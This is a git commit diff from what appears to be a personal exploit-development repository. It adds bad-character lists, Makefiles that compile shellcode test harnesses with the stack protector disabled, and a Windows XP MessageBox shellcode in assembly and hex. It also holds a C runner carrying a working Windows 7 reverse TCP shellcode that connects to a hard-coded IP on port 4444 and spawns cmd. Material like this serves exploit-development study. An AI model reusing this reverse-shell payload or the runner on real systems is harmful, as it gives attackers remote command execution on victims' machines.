Restructure repo

Author: greyshell

.gitignore

@@ -166,5 +166,3 @@ cython_debug/
 egghunter
 shellcode
 test
-
-win32_shellcode_dev/

artifacts/good_char_set/ascii-printable-characters.txt

@@ -0,0 +1,7 @@
+# Removed suspicious bad characters \x00 = null byte, \x0d = CR, \x0a = LF, \x20 = blankspace
+
+# Removing ASCII all control characters
+
+# Showing only ASCII printable characters = 94
+
+# allowed = "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e"

artifacts/good_char_set/general-good-chars (another copy).txt

@@ -0,0 +1,3 @@
+# Removed suspicious bad characters \x00 = null byte, \x0d = CR, \x0a = LF, \x20 = blankspace
+
+# badchar = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

artifacts/good_char_set/general-good-chars.txt

@@ -0,0 +1,3 @@
+# Removed suspicious bad characters \x00 = null byte, \x0d = CR, \x0a = LF, \x20 = blankspace
+
+# allowed = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

artifacts/good_char_set/hpnnm-allowed-chars.txt

@@ -0,0 +1,10 @@
+# HP NNM: bad_char > \x7f
+
+# allowed = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13"
+"\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24"
+"\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x30\x31\x32\x33\x34\x35\x36"
+"\x37\x38\x39\x3b\x3c\x3d\x3e\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
+"\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b"
+"\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c"
+"\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d"
+"\x7e\x7f")

win32_shellcode_dev/messageBox-xp-sp2/Makefile

@@ -0,0 +1,72 @@
+SHELLCODE=shellcode
+TEST=test
+
+
+all: build hex
+
+all-test: test-build test-run
+
+all-clean: clean test-clean
+
+
+build: $(SHELLCODE).o
+	ld -m elf_i386 -o $(SHELLCODE) $(SHELLCODE).o
+	@echo "" 
+
+$(SHELLCODE).o: $(SHELLCODE).asm
+	nasm -f elf32 -o $(SHELLCODE).o $(SHELLCODE).asm
+	@echo ""
+
+run: $(SHELLCODE)
+	./$(SHELLCODE)
+
+debug: $(SHELLCODE)
+	gdb -q ./$(SHELLCODE) -tui
+
+disassemble: $(SHELLCODE)
+	objdump -d $(SHELLCODE) -M intel
+
+hex: $(SHELLCODE)
+	@echo "Size of shellcode:"
+	@size $(SHELLCODE)
+	@echo ""
+	@echo "Shellcode:"
+	@objdump -d ./$(SHELLCODE)|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:| \
+	cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed "s| $$||g" |sed "s/ /\\\\x/g"| \
+	paste -d '' -s | sed "s|^|\"|" | sed "s|$$|\"|g" > $(SHELLCODE).txt
+	@cat $(SHELLCODE).txt
+	@echo ""
+
+clean:
+	rm -f $(SHELLCODE).txt
+	rm -f $(SHELLCODE).o
+	rm -f $(SHELLCODE)
+
+
+test-build: $(TEST)
+
+temp:
+	@cat $(SHELLCODE).txt | sed 's|\\|\\\\|g' > temp
+
+$(TEST): $(SHELLCODE).txt temp
+	@cp /root/pentest/myScript/test.c.template ./
+	@sed 's/SHELLCODE/$(shell cat temp)/' test.c.template > $(TEST).c
+	gcc -m32 $(TEST).c -fno-stack-protector -z execstack -ggdb -o $(TEST)
+	file  $(TEST)
+	@echo ""
+	i586-mingw32msvc-gcc $(TEST).c -lws2_32 -o $(TEST).exe
+	file  $(TEST).exe
+	@echo ""
+	@rm -f temp
+	@rm -f test.c.template 
+
+test-run: $(TEST)
+	./$(TEST)
+
+test-debug: $(TEST)
+	gdb -q ./$(TEST) -tui
+
+test-clean:
+	rm -f $(TEST)
+	rm -f $(TEST).c
+	rm -f $(TEST).exe

win32_shellcode_dev/messageBox-xp-sp2/shellcode.asm

@@ -0,0 +1,78 @@
+;msgbox.asm
+
+[BITS 32]
+[SECTION .text]
+
+global _start
+
+
+_start:
+	;eax holds return value
+	;ebx will hold function addresses
+	;ecx will hold string pointers
+	;edx will hold NULL
+
+	
+	xor eax,eax
+	xor ebx,ebx			;zero out the registers
+	xor ecx,ecx
+	xor edx,edx
+	
+	jmp short GetLibrary
+
+LibraryReturn:
+	pop ecx				;get the library string
+	mov [ecx + 10], dl		;insert NULL
+	mov ebx, 0x7c801d77		;LoadLibraryA(libraryname); for winxp2 =  0x7c801d77
+	push ecx			;beginning of user32.dll
+	call ebx			;eax will hold the module handle
+
+	jmp short FunctionName
+
+FunctionReturn:
+
+	pop ecx				;get the address of the Function string
+	xor edx,edx
+	mov [ecx + 11],dl		;insert NULL
+	push ecx
+	push eax
+	mov ebx,  0x7c80ac28		;GetProcAddress(hmodule,functionname); for winxp2 =  0x7c80ac28
+	call ebx			;eax now holds the address of MessageBoxA
+	
+	jmp short Message
+
+MessageReturn:
+	pop ecx				;get the message string
+	xor edx,edx			
+	mov [ecx+3],dl			;insert the NULL
+
+	xor edx,edx
+	
+	push edx			;MB_OK
+	push ecx			;title
+	push ecx			;message
+	push edx			;NULL window handle
+	
+	call eax			;MessageBoxA(windowhandle,msg,title,type); Address
+
+ender:
+	xor edx,edx
+	push eax			
+	mov eax, 0x7c81caa2 		;exitprocess(exitcode); for winxp2 = 0x7c81caa2
+	call eax			;exit cleanly so we don't crash the parent program
+	
+
+	;the N at the end of each string signifies the location of the NULL
+	;character that needs to be inserted
+	
+
+GetLibrary:
+	call LibraryReturn
+	db 'user32.dllN'
+FunctionName
+	call FunctionReturn
+	db 'MessageBoxAN'
+Message
+	call MessageReturn
+	db 'HeyN'
+

win32_shellcode_dev/messageBox-xp-sp2/shellcode.txt

@@ -0,0 +1 @@
+"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb\x77\x1d\x80\x7c\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x28\xac\x80\x7c\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51\x51\x52\xff\xd0\x31\xd2\x50\xb8\xa2\xca\x81\x7c\xff\xd0\xe8\xc4\xff\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff\xff\x48\x65\x79\x4e"

win32_shellcode_dev/messageBox-xp-sp2/test.c

@@ -0,0 +1,12 @@
+#include<stdio.h>
+#include<string.h>
+ 
+unsigned char code[] = \
+"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb\x77\x1d\x80\x7c\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x28\xac\x80\x7c\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51\x51\x52\xff\xd0\x31\xd2\x50\xb8\xa2\xca\x81\x7c\xff\xd0\xe8\xc4\xff\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff\xff\x48\x65\x79\x4e"; 
+ 
+int main()
+{
+printf("Shellcode Length:  %d\n", strlen(code));
+int (*ret)() = (int(*)())code;
+ret();
+}

win32_shellcode_dev/windows_shell_reverse_tcp/Makefile

@@ -0,0 +1,72 @@
+SHELLCODE=windows7_shell_reverse_tcp
+TEST=test-windows7_shell_reverse_tcp
+
+
+all: build hex
+
+all-test: test-build test-run
+
+all-clean: clean test-clean
+
+
+build: $(SHELLCODE).o
+	ld -m elf_i386 -o $(SHELLCODE) $(SHELLCODE).o
+	@echo "" 
+
+$(SHELLCODE).o: $(SHELLCODE).asm
+	nasm -f elf32 -o $(SHELLCODE).o $(SHELLCODE).asm
+	@echo ""
+
+run: $(SHELLCODE)
+	./$(SHELLCODE)
+
+debug: $(SHELLCODE)
+	gdb -q ./$(SHELLCODE) -tui
+
+disassemble: $(SHELLCODE)
+	objdump -d $(SHELLCODE) -M intel
+
+hex: $(SHELLCODE)
+	@echo "Size of shellcode:"
+	@size $(SHELLCODE)
+	@echo ""
+	@echo "Shellcode:"
+	@objdump -d ./$(SHELLCODE)|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:| \
+	cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed "s| $$||g" |sed "s/ /\\\\x/g"| \
+	paste -d '' -s | sed "s|^|\"|" | sed "s|$$|\"|g" > $(SHELLCODE).txt
+	@cat $(SHELLCODE).txt
+	@echo ""
+
+clean:
+	rm -f $(SHELLCODE).txt
+	rm -f $(SHELLCODE).o
+	rm -f $(SHELLCODE)
+
+
+test-build: $(TEST)
+
+temp:
+	@cat $(SHELLCODE).txt | sed 's|\\|\\\\|g' > temp
+
+$(TEST): $(SHELLCODE).txt temp
+	@cp /root/pentest/myScript/test.c.template ./
+	@sed 's/SHELLCODE/$(shell cat temp)/' test.c.template > $(TEST).c
+	gcc -m32 $(TEST).c -fno-stack-protector -z execstack -ggdb -o $(TEST)
+	file  $(TEST)
+	@echo ""
+	i586-mingw32msvc-gcc $(TEST).c -lws2_32 -o $(TEST).exe
+	file  $(TEST).exe
+	@echo ""
+	@rm -f temp
+	@rm -f test.c.template 
+
+test-run: $(TEST)
+	./$(TEST)
+
+test-debug: $(TEST)
+	gdb -q ./$(TEST) -tui
+
+test-clean:
+	rm -f $(TEST)
+	rm -f $(TEST).c
+	rm -f $(TEST).exe

win32_shellcode_dev/windows_shell_reverse_tcp/test-windows7_shell_reverse_tcp

@@ -0,0 +1,12 @@
+#include<stdio.h>
+#include<string.h>
+ 
+unsigned char code[] = \
+"\x31\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f\x54\xbb\x64\x28\x98\x75\xff\xd3\x89\xc5\x31\xc0\x66\xb8\x75\x70\x50\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x55\xbb\x37\x18\x98\x75\xff\xd3\x31\xdb\x66\xbb\x90\x01\x29\xdc\x54\x53\xff\xd0\x31\xc0\x66\xb8\x74\x41\x50\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x54\x55\xbb\x37\x18\x98\x75\xff\xd3\x31\xdb\x53\x53\x53\x31\xc9\xb1\x06\x51\x43\x53\x43\x53\xff\xd0\x97\xbb\x65\x65\x63\x74\xc1\xeb\x08\x53\x68\x63\x6f\x6e\x6e\x54\x55\xbb\x37\x18\x98\x75\xff\xd3\x68\xac\x10\xe8\x95\x66\x68\x11\x5c\x31\xdb\x80\xc3\x02\x66\x53\x89\xe2\x6a\x10\x52\x57\xff\xd0\xba\x63\x63\x6d\x64\xc1\xea\x08\x52\x89\xe1\x31\xd2\x83\xec\x10\x89\xe3\x57\x57\x57\x52\x52\x31\xc0\x40\xc1\xc0\x08\x40\x50\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52\x31\xc0\x04\x2c\x50\x89\xe0\x53\x50\x52\x52\x52\x31\xc0\x40\x50\x52\x52\x51\x52\xbb\x62\x20\x93\x75\xff\xd3\x31\xd2\x50\xb8\xcf\x2a\x98\x75\xff\xd0"; 
+ 
+main()
+{
+printf("Shellcode Length:  %d\n", strlen(code));
+int (*ret)() = (int(*)())code;
+ret();
+}